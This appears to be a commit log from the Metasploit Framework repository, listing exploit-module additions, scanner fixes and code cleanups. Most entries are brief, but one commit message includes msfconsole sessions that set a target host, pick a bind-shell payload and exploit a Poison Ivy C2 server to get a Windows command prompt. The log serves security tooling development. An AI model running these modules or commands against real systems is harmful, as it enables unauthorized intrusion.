Commit Graph

18812 Commits (3e588ffd62f81978fdd557e83e41693486f1fc0e)

Author SHA1 Message Date
OJ b608abffbc Update payload cache sizes for x64 windows 2015-09-29 09:03:57 +10:00
jvazquez-r7 269641a0ff
Update vmauthd_login to have into account advanced TCP options 2015-09-28 14:38:35 -05:00
jvazquez-r7 2f46335c90
Update brocade_enbale_login to have into account advanced TCP options 2015-09-28 14:36:23 -05:00
jvazquez-r7 adb76a9223
Update telnet_login to have into account advanced TCP options 2015-09-28 14:35:58 -05:00
jvazquez-r7 0eed30ce05
Update pop3_login to have into account advanced TCP options 2015-09-28 14:29:50 -05:00
jvazquez-r7 d02193aaeb
Update mysql_login to have into account advanced TCP options 2015-09-28 14:28:32 -05:00
jvazquez-r7 0abb387c1a Update mssql_login to have into account advanced TCP options 2015-09-28 14:22:19 -05:00
jvazquez-r7 df3e4e8afd
Update ftp_login to have into account advanced TCP options 2015-09-28 14:18:05 -05:00
jvazquez-r7 a99e44b43a
Update vnc_login to have into account advanced TCP options 2015-09-28 14:13:08 -05:00
jvazquez-r7 4d8f0a6ec4
Update db2_auth to have into account advanced Tcp options 2015-09-28 14:10:55 -05:00
jvazquez-r7 07b44fccb9
Update AFP login scanner to have into account advanced options 2015-09-28 14:03:55 -05:00
jvazquez-r7 1e4e5c5bae
Update ACPP login scanner to have into account advanced options 2015-09-28 13:50:20 -05:00
bigendian smalls a47557b9c1
Upd. multi/handler to include mainframe platform
Quick update to multi handler so it recognizes mainframe platform based
modules
2015-09-28 11:14:08 -05:00
Jon Hart 96e4e883ae
Fix #6008 for wireshark_lwres_getaddrbyname_loop 2015-09-27 14:56:11 -07:00
Jon Hart bd2f73f40a
Fix #6008 for wireshark_lwres_getaddrbyname 2015-09-27 14:55:19 -07:00
Jon Hart bbd08b84e5
Fix #6008 for snort_dce_rpc 2015-09-27 14:53:40 -07:00
Jon Hart 989fe49750
Fix #6008 for synflood 2015-09-27 14:50:59 -07:00
Jon Hart 7ad7db7442
Fix #6008 for rogue_send. Correctly. 2015-09-27 14:48:58 -07:00
Jon Hart 7b026676f1
Fix #6008 for avahi_portzero 2015-09-27 14:47:05 -07:00
Jon Hart 20ddb65ff8
Fix #6008 for bnat_scan 2015-09-27 14:18:51 -07:00
Jon Hart 06a10e136a
Fix #6008 for rogue_send 2015-09-27 14:12:23 -07:00
Jon Hart d3a41323b8
Fix #6008 for ipidseq.rb 2015-09-27 14:05:05 -07:00
Jon Hart 5b1ee8c8ca
Fix #6008 for syn.rb 2015-09-27 13:54:11 -07:00
Jon Hart 3888b793bd
Fix #6008 for ack.rb 2015-09-27 13:53:47 -07:00
Jon Hart 766829c939
Fix #6008 for xmas.rb 2015-09-27 13:46:00 -07:00
jvazquez-r7 b206de7708
Land #5981, @xistence's ManageEngine EventLog Analyzer Remote Code Execution exploit 2015-09-27 00:42:17 -05:00
jvazquez-r7 55f573b4c9
Do code cleanup 2015-09-27 00:33:40 -05:00
jvazquez-r7 c85913fd12
Land #5983, @jhart-r7's SOAP PortMapping UPnP auxiliary module 2015-09-26 15:47:04 -05:00
Brent Cook f3451eef75
Land #5380, pageantjacker, an SSH agent proxy 2015-09-26 10:52:44 -04:00
Brent Cook 46ed129966 update to metasploit-payloads 1.0.14 2015-09-26 10:50:20 -04:00
jvazquez-r7 f6f3efea75
print the body as verbose 2015-09-25 13:51:18 -05:00
jvazquez-r7 80c9cd4e6f
Restore required option 2015-09-25 13:41:27 -05:00
jvazquez-r7 e4e9609bc2
Use single quotes 2015-09-25 13:35:38 -05:00
jvazquez-r7 a5698ebce0
Fix metadata 2015-09-25 13:34:16 -05:00
jvazquez-r7 c8880e8ad6
Move local exploit to correct location 2015-09-25 11:37:38 -05:00
jvazquez-r7 6b46316a56
Do watchguard_local_privesc code cleaning 2015-09-25 11:35:21 -05:00
jvazquez-r7 c79671821d Update with master changes 2015-09-25 10:47:37 -05:00
jvazquez-r7 e87d99a65f
Fixing blocking option 2015-09-25 10:45:19 -05:00
jvazquez-r7 890ac92957
Warn about incorrect payload 2015-09-25 10:10:08 -05:00
jvazquez-r7 19b577b30a
Do some code style fixes to watchguard_cmd_exec 2015-09-25 09:51:00 -05:00
jvazquez-r7 b35da0d91d
Avoid USERNAME and PASSWORD datastore options collisions 2015-09-25 09:36:47 -05:00
jvazquez-r7 52c4be7e8e
Fix description 2015-09-25 09:35:30 -05:00
Balazs Bucsay a863409734 x86-64 pushq signedness error fixed. Signed port numbers (2bytes) were not working properly. Fix means +6bytes in shellcode length 2015-09-24 13:07:02 +02:00
JT e185277ac5 Update simple_backdoors_exec.rb 2015-09-24 14:14:23 +08:00
JT 56a551313c Update simple_backdoors_exec.rb 2015-09-24 13:54:40 +08:00
JT 192369607d Update simple_backdoors_exec.rb
updated the string 'echo me' to a random text
2015-09-24 13:49:33 +08:00
Brent Cook 9519eef55d
Land #5993, handle ADSI exceptions nicely 2015-09-23 22:56:44 -05:00
Meatballs 66c9222968
Make web_delivery proxy aware 2015-09-23 20:45:51 +01:00
Daniel Jensen 3dd917fd56 Altered the module to use the primer callback, and refactored some code to remove useless functions etc 2015-09-24 00:20:13 +12:00
Stuart 853d822992 Merge pull request #1 from bcook-r7/land-5380-pageantjacker
update pageantjacker to run as part of extapi
2015-09-23 09:45:53 +01:00
William Vu 44fa188e71
Land #5984, android_mercury_parseuri module 2015-09-23 02:44:53 -05:00
William Vu d798ef0885
Land #5893, w3tw0rk/Pitbul RCE module 2015-09-23 02:41:01 -05:00
jvazquez-r7 2b7ffdc312
Use datastore advanced options used by smb_login 2015-09-21 17:48:05 -05:00
William Vu 8106bcc320 Clean up module 2015-09-21 14:37:54 -05:00
jvazquez-r7 415fa3a244
Fix #5968, some modules not handling Rex::Post::Meterpreter::RequestError exceptions
* Related to the usage of ADSI on unsupported OSes
2015-09-21 14:33:00 -05:00
Stuart Morgan cdd39f52b1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into pageant_extension 2015-09-21 14:34:56 +02:00
Stuart Morgan e8e4f66aaa Merge branch 'master' of ssh://github.com/stufus/metasploit-framework into pageant_extension 2015-09-21 14:34:38 +02:00
Brent Cook 61e7e1d094 update pageantjacker to run as part of extapi 2015-09-20 20:25:00 -05:00
wchen-r7 fd190eb56b
Land #5882, Add Konica Minolta FTP Utility 1.00 CWD command module 2015-09-18 11:10:20 -05:00
wchen-r7 0aea4a8b00 An SEH? A SEH? 2015-09-18 11:09:52 -05:00
wchen-r7 060acbc496 newline 2015-09-17 11:39:39 -05:00
wchen-r7 08b5b8ebb2 Add ADDITIONAL_FILES option 2015-09-17 11:30:58 -05:00
joevennix 0d94b8a48f Make andorid_mercury_parseuri better 2015-09-17 09:59:31 -05:00
Jon Hart 0113cbd353
Nokogiri::XML::Builder instead 2015-09-16 19:53:33 -07:00
jvazquez-r7 927785cfe4
Lan #5783, @jabra-'s module to disclose passwords from grup policy preferences 2015-09-16 21:00:03 -05:00
jvazquez-r7 adab9f9548
Do final cleanup 2015-09-16 20:59:32 -05:00
jvazquez-r7 4d0d806e1d
Do minor cleanup 2015-09-16 19:30:40 -05:00
Brent Cook d2a17074b1
update payload sizes 2015-09-16 17:24:41 -05:00
jvazquez-r7 46168e816b Merge for retab 2015-09-16 17:13:08 -05:00
jvazquez-r7 ab8d12e1ac
Land #5943, @samvartaka's awesome improvement of poisonivy_bof 2015-09-16 16:35:04 -05:00
jvazquez-r7 af1cdd6dea
Return Appears 2015-09-16 16:34:43 -05:00
jvazquez-r7 402044a770
Delete comma 2015-09-16 16:23:43 -05:00
jvazquez-r7 75c6ace1d0
Use single quotes 2015-09-16 16:23:10 -05:00
jvazquez-r7 88fdc9f123
Clean exploit method 2015-09-16 16:14:21 -05:00
jvazquez-r7 d6a637bd15
Do code cleaning on the check method 2015-09-16 16:12:28 -05:00
wchen-r7 c7afe4f663
Land #5930, MS15-078 (atmfd.dll buffer overflow) 2015-09-16 15:33:38 -05:00
jvazquez-r7 688a5c9123
Land #5972, @xistence's portmapper amplification scanner 2015-09-16 14:58:19 -05:00
jvazquez-r7 8ae884c1fc Do code cleanup 2015-09-16 14:46:27 -05:00
jvazquez-r7 37d42428bc
Land #5980, @xistence exploit for ManageEngine OpManager 2015-09-16 13:19:49 -05:00
jvazquez-r7 8f755db850
Update version 2015-09-16 13:19:16 -05:00
jvazquez-r7 1b50dfc367
Change module location 2015-09-16 11:43:09 -05:00
jvazquez-r7 122103b197
Do minor metadata cleanup 2015-09-16 11:41:23 -05:00
jvazquez-r7 aead0618c7
Avoid the WAIT option 2015-09-16 11:37:49 -05:00
wchen-r7 b4aab70d18 Fix another typo 2015-09-16 11:34:22 -05:00
wchen-r7 bef658f699 typo 2015-09-16 11:32:09 -05:00
jvazquez-r7 0010b418d0
Do minor code cleanup 2015-09-16 11:31:15 -05:00
jvazquez-r7 f3b6606709
Fix check method 2015-09-16 11:26:15 -05:00
Daniel Jensen 7985d0d7cb Removed privesc functionality, this has been moved to another module. Renamed module 2015-09-16 23:29:26 +12:00
Daniel Jensen bdd90655e4 Split off privesc into a seperate module 2015-09-16 23:11:32 +12:00
wchen-r7 63bb0cd0ec Add Android Mercury Browser Intent URI Scheme & Traversal 2015-09-16 00:48:57 -05:00
jvazquez-r7 24af3fa12e
Add rop chains 2015-09-15 14:46:45 -05:00
Mo Sadek e911d60195
Land #5967, nil bug fix in SSO gather module 2015-09-15 10:25:50 -05:00
William Vu abe65cd400
Land #5974, java_jmx_server start order fix 2015-09-15 01:33:44 -05:00
xistence c99444a52e ManageEngine EventLog Analyzer Remote Code Execution 2015-09-15 07:29:16 +07:00
xistence 7bf2f158c4 ManageEngine OpManager Remote Code Execution 2015-09-15 07:24:32 +07:00
JT 9e6d3940b3 Update simple_backdoors_exec.rb 2015-09-13 23:30:14 +08:00
wchen-r7 ae5aa8f542 No FILE_CONTENTS option 2015-09-12 23:32:02 -05:00
Daniel Jensen 4e22fce7ef Switched to using Rex MD5 function 2015-09-13 16:23:23 +12:00
xistence 0657fdbaa7 Replaced RPORT 2015-09-13 09:19:05 +07:00
xistence 521636a016 Small changes 2015-09-13 08:31:19 +07:00
jvazquez-r7 0d52a0617c
Verify win32k 6.3.9600.17837 is working 2015-09-12 15:27:50 -05:00
jvazquez-r7 9626596f85
Clean template code 2015-09-12 13:43:05 -05:00
Hans-Martin Münch (h0ng10) 0c4604734e Webserver starts at the beginning, stops at the end 2015-09-12 19:42:31 +02:00
xistence 79e3a7f84b Portmap amplification scanner 2015-09-12 16:25:06 +07:00
xistence dc8d1f6e6a Small changes 2015-09-12 13:08:58 +07:00
wchen-r7 01053095f9 Add MS15-100 Microsoft Windows Media Center MCL Vulnerability 2015-09-11 15:05:06 -05:00
William Vu 5f9f66cc1f Fix nil bug in SSO gather module 2015-09-11 02:21:01 -05:00
William Vu a1a7471154
Land #5949, is_root? for remove_lock_root 2015-09-11 02:09:14 -05:00
wchen-r7 e9e4b60102 move require 'msf/core/post/android' to post.rb 2015-09-11 01:58:12 -05:00
wchen-r7 f2ccca97e0 Move require 'msf/core/post/android' to post.rb 2015-09-11 01:56:21 -05:00
jvazquez-r7 53f995b9c3
Do first prototype 2015-09-10 19:35:26 -05:00
wchen-r7 017832be88
Land #5953, Add Bolt CMS File Upload Vulnerability 2015-09-10 18:29:13 -05:00
wchen-r7 602a12a1af typo 2015-09-10 18:28:42 -05:00
wchen-r7 94aea34d5b
Land #5965, Show the Shodan error message if no result are found 2015-09-10 17:39:25 -05:00
HD Moore cddf72cd57 Show errors when no results are found 2015-09-10 14:05:40 -07:00
wchen-r7 90ef9c11c9 Support meterpreter for OS X post modules 2015-09-10 15:57:43 -05:00
Roberto Soares 68521da2ce Fix check method. 2015-09-10 04:40:12 -03:00
Roberto Soares 4566f47ac5 Fix check method. 2015-09-10 03:56:46 -03:00
Roberto Soares 0ba03f7a06 Fix words. 2015-09-09 21:27:57 -03:00
Roberto Soares bc3f5b43ab Removerd WordPress mixin. 2015-09-09 21:26:15 -03:00
Roberto Soares 4e31dd4e9f Add curesec team as vuln discovery. 2015-09-09 21:13:51 -03:00
Roberto Soares 6336301df3 Add Nibbleblog File Upload Vulnerability 2015-09-09 21:05:36 -03:00
Roberto Soares d3aa61d6a0 Move bolt_file_upload.rb to exploits/multi/http 2015-09-09 13:41:44 -03:00
Roberto Soares 2800ecae07 Fix alignment. 2015-09-09 01:21:08 -03:00
Roberto Soares 48bd2c72a0 Add fail_with method and other improvements 2015-09-09 01:11:35 -03:00
Roberto Soares f08cf97224 Check method implemented 2015-09-08 23:54:20 -03:00
Roberto Soares 6de0c9584d Fix some improvements 2015-09-08 23:15:42 -03:00
JT 31a8907385 Update simple_backdoors_exec.rb 2015-09-09 08:30:21 +08:00
jvazquez-r7 329e6f4633
Fix title 2015-09-08 15:31:14 -05:00
jvazquez-r7 30cb93b4df
Land #5940, @hmoore-r7's fixes for busybox post modules 2015-09-08 15:12:23 -05:00
wchen-r7 122d57fc20
Land #5945, Add auto-accept to osx/enum_keychain 2015-09-08 10:56:08 -05:00
wchen-r7 13afbc4eae Properly check root for remove_lock_root (android post module)
This uses the Msf::Post::Android::Priv mixin.
2015-09-08 10:40:08 -05:00
JT 4e23bba14c Update simple_backdoors_exec.rb
removing the parenthesis for the if statements
2015-09-08 15:47:38 +08:00
JT 002aada59d Update simple_backdoors_exec.rb
changed shell to res
2015-09-08 14:54:26 +08:00
JT 467f9a8353 Update simple_backdoors_exec.rb 2015-09-08 14:45:54 +08:00
JT 37c28ddefb Update simple_backdoors_exec.rb
Updated the description
2015-09-08 13:42:12 +08:00
JT 0f8123ee23 Simple Backdoor Shell Remote Code Execution 2015-09-08 13:08:47 +08:00
joev 1b320bae6a Add auto-accept to osx/enum_keychain. 2015-09-07 21:17:49 -05:00
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
xistence 1d492e4b25 Lots of X11 protocol changes 2015-09-06 15:55:16 +07:00
HD Moore ec5cbc842e Cosmetic cleanups 2015-09-05 22:56:11 -05:00
HD Moore 8c0b0ad377 Fix up jailbreak commands & regex for success detection 2015-09-05 22:54:07 -05:00
JT 2f8dc7fdab Update w3tw0rk_exec.rb
changed response to res
2015-09-05 14:21:07 +08:00
jvazquez-r7 23ab702ec4
Land #5631, @blincoln682F048A's module for Endian Firewall Proxy
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1
Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991
Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29
Use static max length 2015-09-04 16:18:55 -05:00
jvazquez-r7 1ebc25092f
Delete some comments 2015-09-04 16:18:15 -05:00
wchen-r7 da0752e8c2 use fail_with 2015-09-04 15:12:05 -05:00
wchen-r7 7ab506dc06 Use Msf::Post::Android::System#get_build_prop to get the android ver
Instead of grabbing the android version from the module, this
is done by the mixin.
2015-09-04 15:05:45 -05:00
Roberto Soares cc405957db Add some improvements 2015-09-04 16:02:30 -03:00
wchen-r7 5646f2e0c4 successful status should include last_attempted_at 2015-09-04 13:45:44 -05:00
wchen-r7 cf6d5fac2a Use the latest cred API, no more report_auth_info 2015-09-04 13:43:15 -05:00
Roberto Soares 4531d17cab Added the rest of the code 2015-09-04 15:37:42 -03:00
jvazquez-r7 eaf51a2113
Land #5722, @vallejocc's busybox work 2015-09-04 13:36:44 -05:00
jvazquez-r7 5dd0cee36a
Add comment 2015-09-04 13:30:00 -05:00
Roberto Soares b9ba12e42a Added get_token method. 2015-09-04 15:27:28 -03:00
jvazquez-r7 8bfa5bcd09
Do some more minor code cleaning 2015-09-04 13:08:27 -05:00
jvazquez-r7 ac49c80367
Do minor code cleanup 2015-09-04 12:46:21 -05:00
jvazquez-r7 60d2856444
Use id instead of whoami 2015-09-04 12:02:21 -05:00
jvazquez-r7 4fa58efaa0
Allow to configure the DOWNLOAD_TIMEOUT 2015-09-04 11:54:22 -05:00
jvicente 2b2dec3531 Fixed typo direcotry. 2015-09-04 18:52:55 +02:00
jvazquez-r7 319bc2d750
Use downcase 2015-09-04 11:18:09 -05:00
Roberto Soares 6f4f8e34b4 Added method bolt_login. 2015-09-04 10:45:15 -03:00
wchen-r7 d55757350d Use the latest credential API, no more report_auth_info 2015-09-04 03:04:14 -05:00
Roberto Soares a195f5bb9e Initial commit - Skeleton 2015-09-04 04:09:16 -03:00
jvazquez-r7 ef6df5bc26
Use get_target_arch 2015-09-03 16:30:46 -05:00
jvazquez-r7 2588439246
Add references for the win32k info leak 2015-09-03 15:35:41 -05:00
Brent Cook e48bcb4e08
Land #5931, tweak titles 2015-09-03 14:52:52 -05:00
James Lee b2c401696b
Add certutil support.
Tested while landing #5736
2015-09-03 14:24:37 -05:00
James Lee 1e6a1f6d05 Revert "Fix spec like I shoulda done before landing #5736"
This reverts commit 956c8e550d.

Conflicts:
	spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
2015-09-03 14:18:55 -05:00
James Lee b4547711f3
Add certutil support.
Tested while landing #5736
2015-09-03 13:27:10 -05:00
jvazquez-r7 697a6cd335
Rescue the process execute 2015-09-03 13:03:36 -05:00
HD Moore f0ef035a0b Update the module titles to clarify what these do 2015-09-03 12:53:25 -05:00
HD Moore 630057e23f Implement suggestions from the PR discussion 2015-09-03 12:42:51 -05:00
HD Moore 57c8038f07 Merge branch 'master' into land-5413 2015-09-03 12:38:19 -05:00
jvazquez-r7 80a1e32339
Set Manual Ranking 2015-09-03 12:24:45 -05:00
HD Moore 0f1530adc1 Merge branch 'master' into land-5412 2015-09-03 12:22:00 -05:00
HD Moore 6e4ae1238b
Land #5791, show the VHOST in module output 2015-09-03 11:36:19 -05:00
HD Moore b8eee4a9e4 Show the IP address if it doesn't match the VHOST 2015-09-03 11:35:38 -05:00
HD Moore 9b51352c62
Land #5639, adds registry persistence 2015-09-03 11:26:38 -05:00
HD Moore 1b021464fe
Land #5919, remove deprecated VMware modules & update resource script. 2015-09-03 10:23:48 -05:00
jvazquez-r7 dbe901915e
Improve version detection 2015-09-03 09:54:38 -05:00
jvazquez-r7 394b1155b2 Apply stager patch in master 2015-09-03 08:30:09 -05:00
Brent Cook 1440f31756
Land #5637, resiliency improvements to TCP stagers 2015-09-02 22:50:12 -05:00
OJ 3fd9e0311c Update payload sizes 2015-09-03 12:01:11 +10:00
jvazquez-r7 de25a6c23c
Add metadata 2015-09-02 18:32:45 -05:00
HD Moore 9f9bbce034
Land #5840, add LLMNR & mDNS modules 2015-09-02 18:30:29 -05:00
HD Moore 0120e5c443 Cosmetic tweaks, don't report duplicate responses 2015-09-02 18:30:03 -05:00
jvazquez-r7 8f70ec8256
Fix Disclosure date 2015-09-02 18:21:36 -05:00
jvazquez-r7 b912e3ce65
Add exploit template 2015-09-02 17:28:35 -05:00
Jon Hart 42a2a86f32
Back out all changes to ms11_030_dnsapi 2015-09-02 13:53:10 -07:00
Jon Hart 6d1ab101ed
Back out all changes to llmnr_response 2015-09-02 13:52:38 -07:00
HD Moore 4090c2c8ea
Land #5880, adds ScriptHost UAC bypass for Win7/2008 2015-09-02 14:14:18 -05:00
Meatballs 582cc795ac
Remove newlines 2015-09-02 19:42:04 +01:00
HD Moore 43d3e69fb2
Land #5917, update local exploit checks 2015-09-02 12:55:45 -05:00
HD Moore 126fc9881e Cleanup and tweaks 2015-09-02 12:48:53 -05:00
Jon Hart 3d04d53e3a
first pass at better output and report_service 2015-09-02 10:31:46 -07:00
JT b89b6b653a Update trace.rb 2015-09-03 01:26:45 +08:00
JT 73bf812dfd Update trace.rb
removed the cookie
2015-09-03 00:35:23 +08:00
JT 5ecee6aaba Update trace.rb
removed some spaces so that msftidy will be happy
2015-09-03 00:27:22 +08:00
JT 34e0819a6e Modified the HTTP Trace Detection to XST Checker
This was suggested by HD Moore in https://github.com/rapid7/metasploit-framework/pull/5612
2015-09-03 00:19:08 +08:00
HD Moore 95b9208a63 Change recv to get_once to avoid indefinite hangs, cosmetic tweaks. 2015-09-02 10:30:19 -05:00
xistence a81a9e0ef8 Added TIME_WAIT for GUI windows 2015-09-02 16:55:20 +07:00
Meatballs 8f25a006a8
Change to automatic target 2015-09-02 09:13:25 +01:00
Waqas Ali 8e993d7793 Remove deprecated vmware modules 2015-09-02 13:00:15 +05:00
wchen-r7 0c4b020089
Land #5913, Add WP NextGEN Gallery Directory Traversal Vuln 2015-09-02 00:01:35 -05:00
wchen-r7 4275a65407 Update local exploit checks to follow the guidelines.
Please see wiki "How to write a check() method" to learn how
these checkcodes are determined.
2015-09-01 23:26:45 -05:00
HD Moore 347698e93f
Land #5915, fix a warning with the regex 2015-09-01 23:08:01 -05:00
HD Moore 381297ba93 Fix the regex flags 2015-09-01 23:07:48 -05:00
Roberto Soares 626704079d Changed output store_loot 2015-09-02 00:18:10 -03:00
Roberto Soares 96600a96ab Changed html parse by @wchen-r7 2015-09-01 22:03:21 -03:00
Alexander Salmin 3c72467b7d Fixes bug where "cert.rb:47: warning: flags ignored" happens due to some issuer patterns. 2015-09-02 01:02:46 +02:00
Brent Cook 56a1cfd9c8 updated cached payload sizes 2015-09-01 18:02:16 -05:00
Brent Cook 9dd14eb747 Merge branch 'upstream-master' into land-5899-android 2015-09-01 17:11:58 -05:00
Meatballs 27775fbe58
Restrict to 7 and 2k8 2015-09-01 22:23:37 +01:00
HD Moore cd65478d29
Land #5826, swap ExitFunction -> EXITFUNC 2015-09-01 13:58:12 -05:00
Roberto Soares 35661d0182 Add WP NextGEN Gallery Directory Traversal Vuln 2015-09-01 13:28:04 -03:00
Christian Mehlmauer bfc24aea16
change exitfunc to thread 2015-09-01 10:52:25 +02:00
Christian Mehlmauer 115f409fef
change exitfunc to thread 2015-09-01 10:48:07 +02:00
Christian Mehlmauer 5398bf78eb
change exitfunc to thread 2015-09-01 10:46:54 +02:00
Christian Mehlmauer 3e613dc333
change exitfunc to thread 2015-09-01 10:43:45 +02:00
Christian Mehlmauer 648c034d17
change exitfunc to thread 2015-09-01 10:42:15 +02:00
James Lee 1b778d0650
Land #5898, use gem version of php & python meterp 2015-08-31 16:16:36 -05:00
HD Moore ff6fbfa738
Land #5895, rework of ADSI modules 2015-08-31 14:10:41 -07:00
Brent Cook d670a62000
Land #5822, migrate obsolete payload compatibility options 2015-08-31 15:20:20 -05:00
Jon Hart 9a2696aed4
Add Reference 2015-08-31 12:03:17 -07:00
Jon Hart c14cae1425
Make INTERNAL_PORT optional, allowing DELETE to work 2015-08-31 11:30:18 -07:00
Jon Hart 44813370d5
Better name, description and author 2015-08-31 10:42:50 -07:00
Jon Hart 8665134691
Add add/delete action. update logging. rename module again 2015-08-31 10:22:36 -07:00
Jon Hart 436910b25f
Clean up map description 2015-08-28 15:49:29 -07:00
Jon Hart e6e05814d0
Use an OptAddress instead, revert back to client name 2015-08-28 15:43:04 -07:00
Jon Hart 66616eeb95
Remove unused 2015-08-28 15:38:23 -07:00
Jon Hart 35555f5f24
Make most everything configurable and provide useful output 2015-08-28 15:36:49 -07:00
Jon Hart 13dd8222ec
Expose lease duration as an option 2015-08-28 15:22:19 -07:00
Jon Hart d57041136f
Use random port mapping description 2015-08-28 15:09:58 -07:00
Jon Hart 840be71683
Add support for specifying protocol
UDP is fun too.  Are there others?
2015-08-28 14:53:41 -07:00
Jon Hart 45fde928fc
More minor style cleanup 2015-08-28 14:49:57 -07:00
Jon Hart ba95a7d2ac
Convert to using HttpClient 2015-08-28 14:47:13 -07:00
Jon Hart a0aaf93f27
Relocate module to more correct location 2015-08-28 14:20:33 -07:00
Jon Hart 45c2422981
First pass at style cleanup 2015-08-28 14:19:28 -07:00
Jon Hart cba3650488
report_service for mdns/llmnr query 2015-08-28 14:04:52 -07:00
wchen-r7 0c7d2af6bc
Land #5750, Add WP All In One Migration Export Module 2015-08-28 14:12:14 -05:00
wchen-r7 837b6a4f71 Update description 2015-08-28 14:11:51 -05:00
wchen-r7 d2e758ac8b Better failure handling 2015-08-28 14:08:29 -05:00
wchen-r7 3d4cb06c67
Land #5807, Added Module WP Mobile Pack Vuln 2015-08-28 13:43:00 -05:00
wchen-r7 9e7f6d6500 Typos 2015-08-28 13:42:37 -05:00
wchen-r7 9364982467
Land #5665, Add osx rootpipe entitlements exploit for 10.10.3 2015-08-28 13:33:16 -05:00
jvazquez-r7 9c7f97d124
Fix methods name schema 2015-08-28 13:26:52 -05:00
wchen-r7 e45347e745 Explain why vulnerable 2015-08-28 13:26:01 -05:00